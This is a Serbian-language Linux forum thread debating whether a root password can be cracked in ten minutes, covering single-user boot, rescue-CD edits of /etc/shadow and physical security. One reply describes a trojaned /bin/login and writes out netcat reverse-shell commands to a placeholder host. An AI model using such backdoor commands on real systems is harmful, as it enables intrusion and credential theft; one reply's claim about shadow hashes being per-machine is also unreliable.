Stranice: [1]   Idi dole
  Štampaj  
Autor Tema: root passwd za 10 min?  (Pročitano 7523 puta)
vladeck
Gost
« poslato: Sreda, 12. Februar 2003. 01:43:30 »

Malo mi je dosadila prica mnogih ljudi da mogu da mi daju (crackuju) moj root passwd za 10 min:
uvek im kazem da je to glupo, jer ga vec znam wink .
Ipak, ako je stvarno tako, ako neko moze da dobije root passwd za 10 min, zasto Linux developeri ne uradi neki bolji nacin za cuvanje passwda, ili je prica malo dublja? Ne zelim da znam kako (bas me briga huh ), ali bih hteo da cujem istinu koja se krija iza ovoga.
Sačuvana
dinke
Gost
« Odgovor #1 poslato: Sreda, 12. Februar 2003. 02:06:44 »

Ja ga mogu dobiti za 5, ako mi das da sednem za tvoj comp Smiley
Salu na stranu, osim bootovanja u single user modu, ja ne znam ni za jedan siguran metod dobijanja root-a, pogotovo ako sistem koristi shadow passworde.
Medjutim, svaki admin ce ti reci da je "sistem siguran onoliko koliko je njegov admin ulozio truda da ga obezbedi" (ili neku slicnu frazu). Iskreno, i ja bih voleo da cujem neke od tih klinaca, ili jos bolje nekog od iskusnijih administratora sta ima da kaze po tom pitanju.

Pozdrav
D
Sačuvana
tnt
Gost
« Odgovor #2 poslato: Sreda, 12. Februar 2003. 10:33:49 »

Pored boot-ovanja u single modu postoji jos fora sa prosledjivanjem init= kernelu pri samom boot-u. Naravno, oba metoda podrazumevaju da lilo nije zasticen password-om. Ako jeste, obican korisnik moze da ga iscita u /etc/lilo.conf, ali ako se i to skloni (bilo permission ili sam file) sve postaje dosta teze...

Sve ovo se odnosi na to da neko "postane" root i eventualno (ako hoce) posle vrati stari password tako da pravi root ne primeti nista. Koliko ja znam, SAZNAVANJE pravog password-a je prakticno nemoguce zbog shadow-a...

A.S. Nit' sam klinac nit' iskusan administrator cheesy - samo sam video kako to ljudi rade...    wink
Sačuvana
vladeck
Gost
« Odgovor #3 poslato: Četvrtak, 13. Februar 2003. 00:10:10 »

Hvala vam sto ste me uverili da je, ipak, tesko doci do root passworda wink .
Sačuvana
acim
Administrator
Elitni član
*****
Van mreže Van mreže

Poruke: 1.604



Pogledaj profil WWW
« Odgovor #4 poslato: Četvrtak, 13. Februar 2003. 11:56:30 »

Sačuvana

Boban Aćimović, urednik linux.rs
SkyDive
Gost
« Odgovor #5 poslato: Četvrtak, 27. Oktobar 2005. 22:51:21 »

Evo ja vam svima dam da sednete za moj comp i niko mi nece pokrenuti root-a   :PPP

Jednostavno stavis restricted u lilo.conf i moze da ti sedne za komp i najbolji haker od root-a nista
I da tvoju sifru ce mozda dobiti samo preko nekog keyboard logera inace sve i da ima Blu Gen nece je crackovati za 1000 god
Sačuvana
acim
Administrator
Elitni član
*****
Van mreže Van mreže

Poruke: 1.604



Pogledaj profil WWW
« Odgovor #6 poslato: Petak, 28. Oktobar 2005. 00:30:24 »

@SkyDive

Budi precizan, evo ja ću ti ohakovati mašinu za minut, dva.

Butujem sa CD-a neki Rescue sistem, promenim kriptovanu root šifru u /etc/shadow (copy & paste) i rebutujem mašinu sa harda Smiley

Ljudi, zapamtite, mašina je sigurna samo ako je i fizički obezbeđena, dakle, lanci i katanci. Recimo, staviš šifru na BIOS pa ne mogu da prebacim sistem da butuje sa CD-a, OK, otvoriću kućište i resetovati BIOS. Dakle, kod važnih sistema prvo ide fizička bezbednost računara, pa tek posle toga sve ostalo. Vidiš, pre par godina je neko iz Pentagona makao hard disk, tu nema nikakvog hakovanja, jednostavno je neko fizički ukrao disk. O tome je bilo puno vesti na Internetu.
Sačuvana

Boban Aćimović, urednik linux.rs
zeenmc
Gost
« Odgovor #7 poslato: Petak, 06. Januar 2006. 04:22:12 »

POZzz
Ja sam cuo slicne price na tu temu....[pricao sam s nasim hackerima],oni kazu da moze na nekoliko nacin
to da se uradi,ali nisu ni oni sami  sigurni...jedna od fora je da se udje u server,preko mreze,i da se stavi vec pripremljen [izmenjen] program /bin/login,nakon prvog logovanja admina tj root-a,pass se upisuje u neki fajl,nakon nekog vremena preko vec postavljenog backdoor-a,udje se u sistem i pokupi se sifra,copy=>paste....bila je prica da je jedan od njih to uradio sa bash skriptom....nisam pricao stim deckom...tako da neznam da li je to tacno.......



Da napomenem,nije da pljujem ali u nasoj zemlji nema bas puno admina koji su na visokom nivou,a to i dokazuje jedna od jacih fora za jeftih backdoor,pa puno njih i nezna za tu foru

nc  neki-domen.com -p 22 -e /bin/sh       [ovo se bese kuca kad si vec upao na sistem]
nc -v neki-domen.com -e /bin/sh   

zaboravio sm kako ide...ali ko zna net cat znace sta tacno mislim,da samo kazem da se nebavim hackom i slicnom stvarima tako da ja nemam pojma Smiley

BTW kao sto kaze acim
Ljudi, zapamtite, mašina je sigurna samo ako je i fizički obezbeđena, dakle, lanci i katanci. Recimo, staviš šifru na BIOS pa ne mogu da prebacim sistem da butuje sa CD-a, OK, otvoriću kućište i resetovati BIOS. Dakle, kod važnih sistema prvo ide fizička bezbednost računara, pa tek posle toga sve ostalo. Vidiš, pre par godina je neko iz Pentagona makao hard disk, tu nema nikakvog hakovanja, jednostavno je neko fizički ukrao disk. O tome je bilo puno vesti na Internetu.
« Poslednja izmena: Petak, 06. Januar 2006. 04:24:16 zeenmc » Sačuvana
maddox
Gost
« Odgovor #8 poslato: Petak, 06. Januar 2006. 21:24:25 »

@zeenmc
http://phearless.headcoders.net/
Čini mi se da je _bl00dz3r0_ pisao o ovome.
http://phearless.headcoders.net/i1/The_Art_of_Footprinting.txt
Sačuvana
crax0
Moderator
Član
*****
Van mreže Van mreže

Poruke: 37


Pogledaj profil
« Odgovor #9 poslato: Nedelja, 26. Septembar 2010. 00:16:02 »

Tacno , sifru je gotovo nemoguce naci bez fizickog pristupa , u /etc/shadow fajl nalazi se u encryptovanom obliku , koga je nemogce dekriptovati , iako neko uzme tu enkripciju , jer se samo struktura cryptovanja razlikuje od racunara do racunara . Tako da za 10 minuta , isto i za 2 h , znaci nema sanse Wink
Sačuvana
INT80
Novi član
*
Van mreže Van mreže

Poruke: 16


Pogledaj profil
« Odgovor #10 poslato: Ponedeljak, 21. Novembar 2011. 10:04:34 »

Deset minuta!!! hihihi... U pitanju su sekunde ako sedis za masinom. 100%.
Minut ili dva ako je na mrezi i ima neki vuner. Postavlja se pitanje: A sta dalje? LOL
Sačuvana
Stranice: [1]   Idi gore
  Štampaj  
 
Prebaci se na:  

?>